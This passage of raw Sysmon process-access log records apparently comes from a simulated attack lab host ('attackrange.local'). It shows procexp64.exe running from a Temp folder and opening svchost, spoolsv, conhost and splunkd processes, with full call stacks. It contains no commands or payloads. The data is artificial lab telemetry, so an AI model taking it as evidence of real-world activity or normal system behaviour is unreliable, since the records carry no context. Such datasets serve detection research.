RNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dl